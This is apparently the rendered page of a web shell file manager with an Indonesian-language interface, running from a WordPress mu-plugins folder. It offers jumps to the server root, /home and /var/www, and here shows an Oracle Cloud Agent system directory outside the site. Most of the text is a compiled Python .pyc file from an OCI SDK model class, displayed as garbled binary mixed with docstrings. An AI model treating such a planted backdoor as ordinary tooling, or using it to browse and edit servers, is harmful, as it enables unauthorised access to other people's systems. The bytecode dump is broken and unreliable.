📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
os_management
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/os_management/models
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: manage_module_streams_on_managed_instance_details.pyc
a O��f � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )�+ManageModuleStreamsOnManagedInstanceDetailszm The set of changes to make to the state of the modules, streams, and profiles on a managed instance c K sF dddddd�| _ ddddd d�| _d | _d | _d | _d | _d | _d S )a� Initializes a new ManageModuleStreamsOnManagedInstanceDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param is_dry_run: The value to assign to the is_dry_run property of this ManageModuleStreamsOnManagedInstanceDetails. :type is_dry_run: bool :param enable: The value to assign to the enable property of this ManageModuleStreamsOnManagedInstanceDetails. :type enable: list[oci.os_management.models.ModuleStreamDetails] :param disable: The value to assign to the disable property of this ManageModuleStreamsOnManagedInstanceDetails. :type disable: list[oci.os_management.models.ModuleStreamDetails] :param install: The value to assign to the install property of this ManageModuleStreamsOnManagedInstanceDetails. :type install: list[oci.os_management.models.ModuleStreamProfileDetails] :param remove: The value to assign to the remove property of this ManageModuleStreamsOnManagedInstanceDetails. :type remove: list[oci.os_management.models.ModuleStreamProfileDetails] �boolzlist[ModuleStreamDetails]z list[ModuleStreamProfileDetails])� is_dry_run�enable�disable�install�remove�isDryRunr r r r N)� swagger_types� attribute_map�_is_dry_run�_enable�_disable�_install�_remove)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/os_management/models/manage_module_streams_on_managed_instance_details.py�__init__ s"